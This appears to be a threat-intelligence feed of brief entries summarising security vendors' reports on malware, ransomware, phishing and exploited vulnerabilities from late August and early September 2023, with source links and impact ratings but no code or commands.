- A new theft campaign known as the “Steal-It” campaign was just found by Zscaler ThreatLabz. In this campaign, the threat actors use modified versions of Nishang’s Start-CaptureServer PowerShell script to steal and exfiltrate NTLMv2 hashes. They then run various system tasks, extract the data, and exfiltrate it utilizing Mockbin APIs.
Source:
https://www.zscaler.com/blogs/security-research/steal-it-campaign
—
- Intel Source:
- Checkmarx
- Intel Name:
- Info_Stealing_Malware_Plagues_Open_Source_Ecosystem
- Date of Scan:
- 2023-09-06
- Impact:
- LOW
- Summary:
- From April to the middle of August, Checkmarx researchers have seen that threat actor PYTA31 has been actively disseminating “WhiteSnake” malware using malicious packages in the PyPI repository. Multiple operating systems can be targeted by the malware.
—
- Intel Source:
- PaloAlto
- Intel Name:
- More_deep_look_at_RedLine_Stealer_traffic
- Date of Scan:
- 2023-09-06
- Impact:
- LOW
- Summary:
- In July, 2023, Palo Alto team captrued a packet pcap) with a RedLine Stealer infection. Their analyses provided the details and more deeper look look at RedLine Stealer traffic.
Source:
https://unit42.paloaltonetworks.com/wireshark-quiz-redline-stealer-answers/
—
- Intel Source:
- Emanuele Delucia
- Intel Name:
- Analysis_of_the_FBI_Operation_Duck_Hunt
- Date of Scan:
- 2023-09-06
- Impact:
- LOW
- Summary:
- The “Duck Hunt” campaign is linked to a specific campaign called “Operation Duck Hunt” that disrupted the Qakbot botnet. The name might have been chosen to symbolize the effort to track down and disable the Qakbot botnet, similar to shooting down ducks in the game.
—
- Intel Source:
- Morphisec
- Intel Name:
- New_Chaes_Malware_Variant_Targeting_Logistics_and_Financial_Sectors
- Date of Scan:
- 2023-09-06
- Impact:
- LOW
- Summary:
- Researchers at Morphisec have discovered a concerning pattern where many clients, mostly from the banking and logistics industries, were being attacked by a brand-new, highly developed Chaes malware version. Between April and June 2023, variants of the threat were seen to become more sophisticated.
Source:
https://www.morphisec.com/hubfs/Morphisec_Chae$4_Threat_Profile.pdf
—
- Intel Source:
- SOC Radar
- Intel Name:
- Dark_Web_Profile_of_Medusa_Ransomware
- Date of Scan:
- 2023-09-06
- Impact:
- LOW
- Summary:
- Cybersecurity professionals have been aware of the Medusa Ransomware (also known as MedusaLocker). The Medusa Ransomware gang collaborates with international affiliates while using the ransomware-as-a-service (RaaS) business model, expanding its reach and effect even further.
Source:
https://socradar.io/dark-web-profile-medusa-ransomware-medusalocker/
—
- Intel Source:
- ASEC
- Intel Name:
- Backdoor_Distribution_Through_Malicious_LNK
- Date of Scan:
- 2023-09-06
- Impact:
- LOW
- Summary:
- Malware that was formerly delivered in CHM format is now being spread in LNK format, according to ASEC experts. Through the mshta process, this malware runs other scripts that are located at a certain URL. Following that, it gets instructions from the threat actor’s server to engage in more malicious actions.
—
- Intel Source:
- Zscaler
- Intel Name:
- Insights_into_DuckTail_operation
- Date of Scan:
- 2023-09-06
- Impact:
- LOW
- Summary:
- Zscaler ThreatLabz started intel collection for Ducktail operation back in May 2023. For last couple months of collectiing, Zscaler got some critical details about DuckTail’s operational framework. That collection gave Zscaler team a visibility into DuckTail’s end-to-end operations, spanning the entire kill chain from reconnaissance to post-compromise. Zscaler team got valuable insights into DuckTail’s intrusion techniques, compromise tactics, post-compromise procedures, and the underground economy.
Source:
https://www.zscaler.com/blogs/security-research/look-ducktail
—
- Intel Source:
- Cyfirma
- Intel Name:
- New_MaaS_Prysmax_malware
- Date of Scan:
- 2023-09-06
- Impact:
- LOW
- Summary:
- The CYFIRMA research team has detected a new malware-as-a-service known as Prysmax. The malware is completely undetectable by the most of signature-based detections commonly employed by antivirus solutions. By manipulating file associations and executing alongside legitimate .exe processes, Prysmax stealer maximizes its reach and impact.
Source:
https://www.cyfirma.com/outofband/new-maas-prysmax-launches-fully-undetectable-infostealer/
—
- Intel Name:
- Cyberattack_by_APT28_Using_msedge_as_a_Bootloader
- Date of Scan:
- 2023-09-05
- Impact:
- LOW
- Summary:
- Researchers from CERT-UA have observed a deliberate cyber attack against a crucial Ukrainian energy infrastructure site. An email message with a phony sender address and a link to an archive, like “photo.zip,” is being distributed to carry out the malicious scheme.
—
- Intel Source:
- Security Joes
- Intel Name:
- Hackers_Exploiting_MinIO_Storage_System
- Date of Scan:
- 2023-09-05
- Impact:
- LOW
- Summary:
- Infected Microsoft SQL Server (MSSQL) databases were being used to deliver Cobalt Strike and ransomware payloads, according to Securonix Threat Lab research. Using MSSQL as a beachhead, the attackers deploy a variety of payloads, including remote-access Trojans (RATs) and a fresh Mimic ransomware variant named FreeWorld, after first infiltrating the target machine.
—
- Intel Source:
- Okta
- Intel Name:
- Okta_Warns_of_Social_Engineering_Attacks
- Date of Scan:
- 2023-09-04
- Impact:
- LOW
- Summary:
- Recent weeks have seen an increase in social engineering attacks against IT service desk staff, according to several U.S.-based Okta customers. The caller’s tactic was to persuade the service desk staff to reset all multi-factor authentication (MFA) factors enrolled by highly privileged users.
Source:
https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection
—
- Intel Source:
- ASEC
- Intel Name:
- Following_the_Spread_of_Fileless_Malware_Through_Spam_Emails
- Date of Scan:
- 2023-09-04
- Impact:
- LOW
- Summary:
- A phishing campaign that spreads via spam emails and runs a PE file (EXE) without placing the file on the user’s computer has been uncovered by ASEC researchers. The malware strains AgentTesla, Remcos, and LimeRAT are finally executed by the malware attachment in the hta extension.
—
- Intel Source:
- Securonix Threat Labs
- Intel Name:
- FreeWorld_Ransomware_Attacks_on_MSSQL_Databases
- Date of Scan:
- 2023-09-04
- Impact:
- MEDIUM
- Summary:
- Infected Microsoft SQL Server (MSSQL) databases were being used to deliver Cobalt Strike and ransomware payloads, according to Securonix Threat Lab research. Using MSSQL as a beachhead, the attackers deploy a variety of payloads, including remote-access Trojans (RATs) and a fresh Mimic ransomware variant named FreeWorld, after first infiltrating the target machine.
—
- Intel Source:
- Seqrite
- Intel Name:
- ZeroDay_Vulnerabilities_Detected_on_WinRAR
- Date of Scan:
- 2023-09-04
- Impact:
- MEDIUM
- Summary:
- In the widely used WinRAR software, the zero-day vulnerabilities CVE-2023-38831 and CVE-2023-40477 have been discovered. The possibility of remote code execution presented by these vulnerabilities raises serious security concerns. With half a billion users globally, it is a well-liked compression tool that is essential to numerous digital processes.
Source:
https://www.seqrite.com/blog/threat-advisory-zero-day-vulnerabilities-detected-on-winrar/
—
- Intel Source:
- Interlab
- Intel Name:
- A_new_campaign_of_novel_RAT
- Date of Scan:
- 2023-09-02
- Impact:
- LOW
- Summary:
- On 8/28/2023, Interlab got some a sample which was sent to a journalist with highly targeted content luring the recipient to open the document. After checking it, Interlab discovered that after initial compromise, the execution of an AutoIT script that was used to perform process injection using a process hollowing technique. The injected process contained a novel RAT, which was named “SuperBear” due to naming conventions in the code.
—
- Intel Source:
- Talos
- Intel Name:
- Analyses_on_new_open_source_infostealer
- Date of Scan:
- 2023-09-02
- Impact:
- LOW
- Summary:
- This week’s edition of the Threat Source newsletter. Talos is seeing more and more bad guys take advantage of the availability of tools that have been added to public malware sites, such as the infostealer “SaphireStealer” which was analyzed by Talos reserachers and shared in their blog.
Source:
https://blog.talosintelligence.com/new-open-source-infostealer-and-reflections-on-2023-so-far/
—
- Intel Source:
- Rapid7
- Intel Name:
- New_IDAT_Loader_executes_StealC_and_Lumma_Infostealers
- Date of Scan:
- 2023-09-02
- Impact:
- LOW
- Summary:
- Recently, Rapid7 discoverd the Fake Browser Update tricking users into executing malicious binaries. While analyzing the dropped binaries, Rapid7 determined a new loader is utilized in order to execute infostealers on compromised systems including StealC and Lumma.
—
- Intel Source:
- Resecurity
- Intel Name:
- The_attacks_on_USPS_and_US_Citizens_for_data_theft
- Date of Scan:
- 2023-09-01
- Impact:
- LOW
- Summary:
- Resecurity has discovered a big-scale smishing campaign targeting the US Citizens. Similar scams have been noticed before targeting Fedex and UPS. The bad actors attributed to Chinese-speaking cybercriminals are leveraging a package tracking text scam sent via iMessage to collect personal (PII) and payment information from the victims with the goal of identity theft and credit card fraud. The cybercriminal group with associated campaign has been named “Smishing Triad” as it leverages smishing as the main attack vector and originates from China.
Source:
https://www.resecurity.com/blog/article/smishing-triad-targeted-usps-and-us-citizens-for-data-theft
—
- Intel Source:
- CERT-UA
- Intel Name:
- Exploitation_of_CVE_2023_38831
- Date of Scan:
- 2023-09-01
- Impact:
- LOW
- Summary:
- The Ukrainian CERT-UA government computer emergency response team has noted a cyberattack by the UAC-0057 group. It was discovered that the “Zbirnyk_tez_Y_23.rar” file contained an exploit for the CVE-2023-38831 vulnerability. If this exploit is successful, it will cause the BAT file “16872_16_2023_03049.pdf.cmd” to be launched, which will cause the LNK file “16872_16_2023_03049.lnk” to launch, which will then use the mshta.
—
- Intel Source:
- Checkpoint
- Intel Name:
- Custom_Executable_Formats_From_Hidden_Bee_to_Rhadamanthys
- Date of Scan:
- 2023-09-01
- Impact:
- LOW
- Summary:
- The design and implementation of Hidden Bee coin miner and Rhadamanthys stealer considerably overlap. Custom executable formats, the usage of comparable virtual filesystems, the use of LUA scripts, identical routes to some of the components, reused functions, similar use of steganography, and overall related architecture are just a few examples of the similarities that are readily obvious.
—
- Intel Source:
- Eclecticiq
- Intel Name:
- Decrypting_Key_Group_Ransomware
- Date of Scan:
- 2023-09-01
- Impact:
- LOW
- Summary:
- EclecticIQ analysts discovered that Key Group ransomware can be classified as a low-sophisticated threat actor. The ransomware samples contained multiple cryptographic mistakes that enabled EclecticIQ to create a decryption tool for this specific ransomware version built in August 03,2023. Key Group or KEYGROUP777, is a Russian-speaking cybercrime actor focusing on financial gain by selling Personal Identifying Information (PII) or initial access to compromised devices and obtaining ransom money.
—
- Intel Source:
- Cybergeeks
- Intel Name:
- A_detailed_analyses_of_Brute_Ratel_C4_payloads
- Date of Scan:
- 2023-09-01
- Impact:
- LOW
- Summary:
- Cyber Geeks did deep analyses of Brute Ratel C4 payloads. Brute Ratel C4 is a Red Team & Adversary simulation software that can be considered an alternative to Cobalt Strike.
Source:
https://cybergeeks.tech/a-deep-dive-into-brute-ratel-c4-payloads/
—
- Intel Source:
- Trustwave
- Intel Name:
- Malicious_PDFs
- Date of Scan:
- 2023-09-01
- Impact:
- LOW
- Summary:
- Last couple months, Trustwave SpiderLabs analysts have noticed a spikein threat actors employing PDF documents to gain initial access through email-borne attacks. Though the use of PDF files as a malicious vector is not a novel approach, it has become more popular as threat actors continue to experiment with techniques to bypass conventional security controls.
—
- Intel Source:
- TrendMicro
- Intel Name:
- Taking_down_the_main_admin_of_phishing_as_a_service_16shop
- Date of Scan:
- 2023-09-01
- Impact:
- LOW
- Summary:
- TrendMicro did analyses and investigations on phishing-as-a-service 16shop through the years. Plus was mentioned about he partnership between Trend Micro and Interpol in taking down the main administrators and servers of this massive phishing campaign.
—
- Intel Source:
- Talos
- Intel Name:
- An_Open_Source_Info_Stealer_Named_SapphireStealer
- Date of Scan:
- 2023-09-01
- Impact:
- LOW
- Summary:
- In December 2022, SapphireStealer was first published by the open-source community as an information stealing malware. Since then, it’s been observed across a number of public malware repositories with increasing frequency. The researchers have moderate confidence that multiple entities are using SapphireStealer. They have separately improved and modified the original code base, extending it to support additional data exfiltration mechanisms.
Source:
https://blog.talosintelligence.com/sapphirestealer-goes-open-source/
—
- Intel Source:
- Fortinet
- Intel Name:
- The_attacks_on_Adobe_ColdFusion
- Date of Scan:
- 2023-08-31
- Impact:
- LOW
- Summary:
- Last month, Adobe took some counter measurementsto the exploitation of targeting pre-authentication remote code execution (RCE) vulnerabilities in their ColdFusion solution. FortiGuard Labs IPS telemetry data again detected numerous efforts to exploit the Adobe ColdFusion deserialization of untrusted data vulnerability, which creates a huge risk of arbitrary code execution. These attacks include probing, establishing reverse shells, and deploying malware for subsequent actions. Fortinet nalysts shared their detailed analysis of how this threat group exploits the Adobe ColdFusion vulnerability.
—
- Intel Source:
- ASEC
- Intel Name:
- Examining_Andariel_Recent_Attacking_Activities
- Date of Scan:
- 2023-08-31
- Impact:
- LOW
- Summary:
- Attacks thought to have been carried out by the Andariel group have been found by ASEC researchers. It is known that the Lazarus threat group or one of its affiliates is associated with the Andariel threat group, which typically targets Korean businesses and organizations. Since 2008, attacks on targets in Korea have been noted.
—
- Intel Source:
- Sentilone
- Intel Name:
- A_new_wave_of_Good_Day_ransomware_attacks
- Date of Scan:
- 2023-08-31
- Impact:
- LOW
- Summary:
- Sentilone reserachers shared in their blog several unique Good Day ransom notes and victim portals and shared their analysis of a sample associated with a URL leading to a known Cloak extortion site. Good Day ransomware, a variant within the ARCrypter family. This new wave of Good Day attacks feature individual TOR-based victim portals for each target.
—
- Intel Source:
- Walmart Global Tech Blog
- Intel Name:
- DGA_analysis_and_the_Gazavat_DMSniff_link
- Date of Scan:
- 2023-08-31
- Impact:
- LOW
- Summary:
- Gazavat, a multi-functional backdoor that shares code with the POS malware DMSniff, is also known as Expiro, at least in part. It has been grouped alongside a few other malware versions throughout the years under the name Expiro, a file infector, by AV companies. This is a result of various malware families using the Carberp malware leak’s leaked code.
Source:
https://medium.com/walmartglobaltech/gazavat-expiro-dmsniff-connection-and-dga-analysis-8b965cc0221d
—
- Intel Source:
- Rapid7
- Intel Name:
- The_increased_threat_activity_against_Cisco_ASA_SSL_VPN_appliances
- Date of Scan:
- 2023-08-31
- Impact:
- MEDIUM
- Summary:
- Rapid7’s managed detection and response team have discovered increased threat activity targeting Cisco ASA SSL VPN appliances (physical and virtual). In some cases, adversaries have created credential stuffing attacks that leveraged weak or default passwords; in others, the activity was observed appears to be the result of targeted brute-force attacks on ASA appliances where multi-factor authentication (MFA) was either not enabled or was not enforced for all users (i.e., via MFA bypass groups).
—
- Intel Source:
- Secureworks
- Intel Name:
- The_actions_against_the_Qakbot_botnet
- Date of Scan:
- 2023-08-30
- Impact:
- MEDIUM
- Summary:
- On August 29, 2023, U.S. law enforcement started a national operation for a that disruptionof the Qakbot botnet (also known as Qbot) and associated infrastructure. Secureworks Counter Threat Unit researchers have observed and monitored for a long time this botnet and detected the disruption activity on August 25. The initial access vector for these intrusions was a phishing email. Qakbot was one of the top malware threats, used by cybercriminals to deliver other malware such as Conti, ProLock, Egregor, REvil, MegaCortex, and Black Basta. The botnet was lucrative for the GOLD LAGOON threat group, which has operated the Qakbot malware since 2007. The threat actors reportedly received approximately $58 million in ransom payments between October 2021 and April 2023.
Source:
https://www.secureworks.com/blog/qakbot-campaign-delivered-black-basta-ransomware
—
- Intel Source:
- Aquasec
- Intel Name:
- The_exploition_of_Kinsing_Malware
- Date of Scan:
- 2023-08-30
- Impact:
- LOW
- Summary:
- Aqua Nautilus observed a new malware campaign that exploits the Openfire vulnerability (CVE-2023-32315) which deploys Kinsing malware and a cryptominer. This vulnerability leads to a path traversal attack, which grants an unauthenticated user access to the Openfire setup environment. This then allows the threat actor to create a new admin user and upload malicious plugins. Eventually the attacker can gain full control over the server.
Source:
https://blog.aquasec.com/kinsing-malware-exploits-novel-openfire-vulnerability
—
- Intel Source:
- Trustwave
- Intel Name:
- The_Rise_of_QR_Codes_in_Phishing
- Date of Scan:
- 2023-08-30
- Impact:
- LOW
- Summary:
- Threat actors are taking image phishing to the advance level by taking advantage of QR codes, a.k.a. ‘Qishing’, to hide their malicious URLs. The samples Tustwave analysts observed have been useing the technique are primarily disguised as Multifactor Authentication (MFA) notifications, which tricks their victims into scanning the QR code with their mobile phones to gain access. However, instead of going to the target’s desired location, the QR code leads them to the threat actor’s phishing page.
—
- Intel Source:
- TrendMicro
- Intel Name:
- Earth_Estries_Targeting_Government_and_Technology_Sector
- Date of Scan:
- 2023-08-30
- Impact:
- MEDIUM
- Summary:
- Researchers from TrendMicro have uncovered a fresh cyberespionage operation by the Earth Estries hacker collective. As Earth Estries targets governments and enterprises in the technology sector, they found parallels with the advanced persistent threat (APT) group FamousSparrow after analyzing the deployed tactics, methods, and procedures (TTPs).
—
- Intel Source:
- McAfee
- Intel Name:
- RemcosRat_Malware_Peeled_Back
- Date of Scan:
- 2023-08-30
- Impact:
- LOW
- Summary:
- Researchers from McAfee have discovered a Remcos RAT operation that uses phishing emails to distribute malicious VBS scripts. A ZIP/RAR attachment was included in a phishing email. There is a highly obscured VBS file inside of this ZIP.
Source:
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/peeling-back-the-layers-of-remcosrat-malware/
—
- Intel Source:
- Sophos
- Intel Name:
- Hackers_Targeting_Unpatched_Citrix_and_NetScaler_Systems
- Date of Scan:
- 2023-08-29
- Impact:
- LOW
- Summary:
-
A campaign by threat actors to target unpatched Citrix and NetScaler systems that are online is being monitored by Sophos X-Ops at the moment. The data shows a considerable similarity between CVE-2023-3519-based attacks that deliver malware and webshells and earlier attempts that used a lot of the same TTPs.
IOC link: https://github.com/sophoslabs/IoCs/blob/master/2023-08-25%20Citrix%20CVE-2023-3519%20attacks.csv
Source:
https://infosec.exchange/@SophosXOps/110951651051968204
—
- Intel Source:
- JPCERT
- Intel Name:
- Embedding_a_malicious_Word_file_into_a_PDF_file
- Date of Scan:
- 2023-08-29
- Impact:
- LOW
- Summary:
- JPCERT/CC has discovered a new technique was used in a July attack, which bypassed detection by embedding a malicious Word file into a PDF file. They described in their blog the technique “MalDoc in PDF” and explained the details of and countermeasures against it.
Source:
https://blogs.jpcert.or.jp/en/2023/08/maldocinpdf.html
—
- Intel Source:
- Phylum
- Intel Name:
- NPM_Package_Masquerading
- Date of Scan:
- 2023-08-29
- Impact:
- LOW
- Summary:
- On August 24th 2023,, Phylum’s detection system observed a suspicious package published to npm called “emails-helper.” After investigating it, it was determined that this package was part of an sophisticated attack involving Base64-encoded and encrypted binaries. The scheme delivers encryption keys from a DNS TXT record hosted on a remote server. Additionally, a hex-encoded URL is retrieved from this remote server and then passed to the spawned binaries. The outcome of it is the deployment of powerful penetration testing tools such as dnscat2, mettle, and Cobalt Strike Beacon.
Source:
https://blog.phylum.io/npm-emails-validator-package-malware/
—
- Intel Source:
- Telekom Security
- Intel Name:
- DarkGate_Malware_Activity_Spikes
- Date of Scan:
- 2023-08-29
- Impact:
- LOW
- Summary:
- Telekom security researchers have identified that a new malspam campaign was observed deploying an off-the-shelf malware called DarkGate. The current spike in DarkGate malware activity is plausible given the fact that the developer of the malware has recently started to rent out the malware to a limited number of affiliates.
Source:
https://github.security.telekom.com/2023/08/darkgate-loader.html
—
- Intel Source:
- Security Affairs
- Intel Name:
- Target_on_Citrix_NetScaler_systems_in_massive_attacks
- Date of Scan:
- 2023-08-29
- Impact:
- MEDIUM
- Summary:
- Sophos X-Ops has tracked an ongoing campaign, which is targeting Citrix NetScaler systems, conducted by threat actors linked to the FIN8 group. The hackers are exploiting the remote code execution, tracked as CVE-2023-3519, in a large-scale campaign. The flaw CVE-2023-3519 (CVSS score: 9.8) is a code injection that could result in unauthenticated remote code execution.
Source:
https://securityaffairs.com/150028/hacking/fin8-citrix-netscaler.html?amp=1
—
- Intel Source:
- CERT-UA
- Intel Name:
- Emails_Containing_BAT_Files_in_BZIP_GZIP_and_RAR_Archives
- Date of Scan:
- 2023-08-28
- Impact:
- MEDIUM
- Summary:
- The distribution of emails with attachments in the form of BZIP, GZIP, and RAR archives containing BAT files made with the aid of the ScrubCrypt cryptor (price – from USD 249), the launch of which will guarantee that the computer is affected by the malicious program AsyncRAT, has been observed by CERT-UA researchers.
—
- Intel Source:
- Juniper
- Intel Name:
- DreamBus_Botnet_comes_back
- Date of Scan:
- 2023-08-28
- Impact:
- LOW
- Summary:
- Juniper Threat Labs reserachers has observed multiple attacks where threat actors used a vulnerability affecting RocketMQ servers (CVE-2023-33246) to infiltrate systems and install the malicious DreamBus bot, a malware strain last seen in 2021. This vulnerability opened the door for hackers to exploit the RocketMQ platform, leading to a series of attacks. Juniper analysts shared the details in their blog of the attacks and the bot.
—
- Intel Source:
- Akamai
- Intel Name:
- IoT_Targeting_Malware_Expands_Threat_Landscape
- Date of Scan:
- 2023-08-28
- Impact:
- LOW
- Summary:
- The Akamai Security Intelligence Response Team (SIRT) has identified a concerning evolution in the KmsdBot malware campaign. The newly discovered Kmsdx binary marks a significant update, now focusing on targeting Internet of Things (IoT) devices. This version of the malware incorporates telnet scanning capabilities and supports a wider range of CPU architectures, expanding its attack potential. The update underscores the ongoing threat posed by vulnerable IoT devices and reinforces the critical need for continuous security measures and updates. KmsdBot’s scope encompasses private gaming servers, cloud hosting providers, and specific government and educational sites, suggesting a persistent concern for IoT security in a rapidly evolving threat landscape.
Source:
https://www.akamai.com/blog/security-research/updated-kmsdbot-binary-targeting-iot
—
- Intel Source:
- DFIR Report
- Intel Name:
- Widespread_Ransomware_is_Caused_by_HTML_Smuggling
- Date of Scan:
- 2023-08-28
- Impact:
- LOW
- Summary:
- Researchers from the DFIR report have noted that the threat actor behind the Nokoyawa Ransomware only deployed the final ransomware 12 hours after the initial intrusion. In November 2022, this threat actor used HTML smuggling to send businesses a password-protected ZIP file. An ISO file that distributed IcedID, which then used Cobalt Strike and finally Nokoyawa ransomware, was contained in the password-protected ZIP file.
Source:
https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/
—
- Intel Source:
- Ironnet
- Intel Name:
- An_increase_in_MacOS_malware_detections
- Date of Scan:
- 2023-08-28
- Impact:
- LOW
- Summary:
- IronNet has observed an increase in MacOS malware within IronDome’s Education sector over the past couple of weeks. Their analysts investigated into these incidents found these infections were originating from already-infected personal devices that were brought into education networks, with the majority of these occurring at higher education institutions.
Source:
https://www.ironnet.com/blog/back-to-school-reminder-keep-your-macs-clean
—
- Intel Source:
- Netenrich
- Intel Name:
- In_Depth_Analysis_of_ADHUBLLKA_Ransomware_Family
- Date of Scan:
- 2023-08-28
- Impact:
- LOW
- Summary:
- Researchers at Netenrich examined the Adhubllka ransomware, which is targeting regular people and small businesses with ransoms ranging from $800 to $1,600 since at least January 2020.
Source:
https://netenrich.com/blog/discovering-the-adhubllka-ransomware-family
—
- Intel Source:
- ASEC
- Intel Name:
- Case_Studies_of_MS_SQL_Server_Proxyjacking
- Date of Scan:
- 2023-08-28
- Impact:
- MEDIUM
- Summary:
- Poorly managed MS-SQL servers have been the subject of proxyjacking attacks, according to ASEC experts. One of the primary attack methods for Windows systems is to employ publicly accessible MS-SQL servers with easy-to-guess passwords. Threat actors frequently attempt to obtain access to poorly maintained MS-SQL servers via brute force or dictionary assaults. If successful, they infect the system with malware.
—
- Intel Source:
- Trellix
- Intel Name:
- Recent_activity_of_Scattered_Spider_threat_group
- Date of Scan:
- 2023-08-26
- Impact:
- MEDIUM
- Summary:
- Trellix researchers in their blog describe the details of the modus operandi of Scattered Spider; their recent events and tools leveraged by tthem, vulnerabilities exploited, and their impact. It also indicates that this group has started targeting other sectors, including critical infrastructure organizations. Scattered Spider is known for theft of sensitive data and leveraging trusted organizational infrastructure for follow-on attacks on downstream customers.
—
- Intel Source:
- Talos
- Intel Name:
- Lazarus_Group_new_threat_CollectionRAT
- Date of Scan:
- 2023-08-25
- Impact:
- HIGH
- Summary:
- Researchers from Cisco Talos have discovered another Lazarus Group’s new threat called “CollectionRAT”. CollectionRAT has standard remote access trojan (RAT) capabilities, including the ability to run arbitrary commands on an infected system. Cisco Talos analysts made analysis on it and came to the conclusion that CollectionRAT appears to be connected to Jupiter/EarlyRAT, another malware family Kaspersky recently wrote about and attributed to Andariel, a subgroup within the Lazarus Group umbrella of threat actors.
Source:
https://blog.talosintelligence.com/lazarus-collectionrat/
—
- Intel Source:
- Talos
- Intel Name:
- Lazarus_Group_Exploits_ManageEngine_Flaw_to_Launch_QuiteRAT
- Date of Scan:
- 2023-08-25
- Impact:
- HIGH
- Summary:
- Researchers from Cisco Talos have identified the Lazarus Group as a state-sponsored actor operating against European and American healthcare organizations and internet backbone infrastructure. This is the third known effort that this actor is responsible for in less than a year, and they have all utilized the same infrastructure.
Source:
https://blog.talosintelligence.com/lazarus-quiterat/
—
- Intel Source:
- Cyfirma
- Intel Name:
- The_Constant_Threat_Posed_by_Remcos_RAT
- Date of Scan:
- 2023-08-25
- Impact:
- LOW
- Summary:
- Researchers from Cyfirma have examined an ongoing operation run by the Remcos Remote Access Trojan (RAT). The analysis reveals a highly developed threat ecosystem that makes use of a number of strategies, including malicious IP addresses, covert payloads, and complex functions that infect systems and acquire sensitive data.
Source:
https://www.cyfirma.com/outofband/the-persistent-danger-of-remcos-rat/
—
- Intel Source:
- Microsoft
- Intel Name:
- A_Chinese_threat_actor_group_Flax_Typhoon_access_Taiwanese_organizations
- Date of Scan:
- 2023-08-25
- Impact:
- LOW
- Summary:
- Microsoft has detected a pattern of malicious activity affecting organizations in Taiwan using techniques that could be easily reused in other operations everywhere else. Microsoft assignes this campaign to Flax Typhoon (overlaps with ETHEREAL PANDA), a nation-state actor based out of China. Flax Typhoon’s observed behavior tells the threat actor intends to perform espionage and maintain access to organizations across a broad range of industries for as long as possible.
—
- Intel Source:
- Eclecticiq
- Intel Name:
- The_Investigation_of_RedLine_Stealer_Spam_Campaign
- Date of Scan:
- 2023-08-25
- Impact:
- LOW
- Summary:
- EclecticIQ researchers have gathered samples from a RedLine stealer spam campaign that ran between April and August 2023. The campaign was successful by distributing command and control among recently created domains hosted on IP addresses with reliable traffic, and Redline developers provide minor iterations to previous variants.
Source:
https://blog.eclecticiq.com/redline-stealer-variants-demonstrate-a-low-barrier-to-entry-threat
—
- Intel Source:
- Secureworks
- Intel Name:
- Smoke_Loader_Dropping_Geolocation_Malware_And_Flimsy_Recon_WiFi_Scanning_Software
- Date of Scan:
- 2023-08-25
- Impact:
- LOW
- Summary:
- Researchers from Secureworks have seen the Smoke Loader botnet deliver a specific Wi-Fi scanning program to compromised systems. This trojan was given the name Whiffy Recon. With the help of adjacent Wi-Fi access points as a source of information, it triangulates the coordinates of the infected PCs using Google’s geolocation API.
—
- Intel Source:
- Any.Run
- Intel Name:
- Technical_Analysis_of_XWorm_Malware
- Date of Scan:
- 2023-08-24
- Impact:
- LOW
- Summary:
- AnyRun researchers have seen the latest version of an XWorm sample — a widespread malicious program that is advertised for sale on underground forums.
Source:
https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/
—
- Intel Source:
- Safebreach
- Intel Name:
- New_Threat_Coverage_Akira_8Base_and_Rorschach
- Date of Scan:
- 2023-08-24
- Impact:
- MEDIUM
- Summary:
- Safebreach researchers have observed that the Hacker’s Playbook Threat Coverage round-up unveils added coverage for recently identified ransomware and malware variants, including Akira ransomware, 8Base ransomware, Rorschach (BabLock) ransomware, and others. SafeBreach customers can now simulate and assess their defenses against these evolving threats using the SafeBreach Hacker’s Playbook™.
Source:
https://www.safebreach.com/resources/akira-ransomware-8base-threat-coverage/
—
- Intel Source:
- Malwarebytes
- Intel Name:
- Evolving_Malvertising_Tactics_advanced_Cloaking_Strategies
- Date of Scan:
- 2023-08-24
- Impact:
- LOW
- Summary:
- Malvertising campaigns are evolving with the adoption of advanced cloaking techniques that hinder detection and response. This article explores a recent malvertising chain that employs intricate fingerprinting, using encoded JavaScript, to assess visitor legitimacy. This escalating cyber battle underscores the challenges faced by defenders in countering these deceptive tactics
—
- Intel Source:
- Zscaler
- Intel Name:
- New_Info_Stealer_Family_Named_Agniane
- Date of Scan:
- 2023-08-24
- Impact:
- LOW
- Summary:
- Agniane Stealer is a novel information stealer family discovered by Zscaler researchers. This malware takes credentials, system data, and session information from browsers, tokens, and file transfer tools. When Agniane Stealer acquires sensitive data, it passes it to command-and-control servers, where threat actors can act on the stolen information.
Source:
https://www.zscaler.com/blogs/security-research/agniane-stealer-dark-webs-crypto-threat
—
- Intel Source:
- SOC Radar
- Intel Name:
- Raccoon_Stealer_Returns_with_New_Version
- Date of Scan:
- 2023-08-24
- Impact:
- LOW
- Summary:
- SOC Radar researchers have discovered that the creators of the data-stealing malware Raccoon Stealer have ended their six-month online silence. They are currently encouraging potential hackers to use the updated 2.3.0 malware (2.3.0.1 since August 15, 2023) version.
Source:
https://socradar.io/raccoon-stealer-resurfaces-with-new-enhancements/
—
- Intel Source:
- Sentinelone
- Intel Name:
- Evolution_of_Ransomware_Linux_and_ESXi_Focused_Threats
- Date of Scan:
- 2023-08-24
- Impact:
- LOW
- Summary:
- SentinelOne researchers have observed that Ransomware tactics have evolved, with attackers now targeting Linux and VMWare ESXi platforms alongside Windows. This article explores recent ransomware families like MONTI Locker, Akira Ransomware, Trigona Linux Locker, and Abyss Locker. These threats exhibit cross-platform capabilities and strategic code reuse.
—
- Intel Source:
- Trendmicro
- Intel Name:
- AI_Hype_Abused_in_Malicious_Facebook_Ads
- Date of Scan:
- 2023-08-23
- Impact:
- LOW
- Summary:
- Trendmicro researchers have identified Cybercriminals are capitalizing on the excitement surrounding Artificial Intelligence (AI) advancements through deceptive Facebook ads. These ads promise AI-powered advantages but instead distribute a malicious browser add-on that aims to steal victims’ credentials. By exploiting AI enthusiasm, attackers are using URL shorteners and cloud storage to spread their harmful payload.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Dropping_AgentTesla_Exotic_Excel_Files
- Date of Scan:
- 2023-08-23
- Impact:
- LOW
- Summary:
- SANS researchers discovered that attackers prefer to employ more unusual extensions to boost their chances of escaping simple and foolish mail gateway regulations. This time, the extension “.xlam” was used.It discovered multiple emails that sent.xlam files to potential victims.
Source:
https://isc.sans.edu/diary/More+Exotic+Excel+Files+Dropping+AgentTesla/30150/
—
- Intel Source:
- Welivesecurity
- Intel Name:
- Spacecolon_Deploy_Scarab_Ransomware_on_Vulnerable_Servers
- Date of Scan:
- 2023-08-23
- Impact:
- LOW
- Summary:
- ESET researchers examined the Spacecolon, a modest toolset used to distribute Scarab ransomware versions to victims all around the world. It is most likely introduced into victim organisations by its operators exploiting insecure web servers or brute-forcing RDP credentials.
Source:
https://www.welivesecurity.com/en/eset-research/scarabs-colon-izing-vulnerable-servers/
—
- Intel Source:
- Cyfirma
- Intel Name:
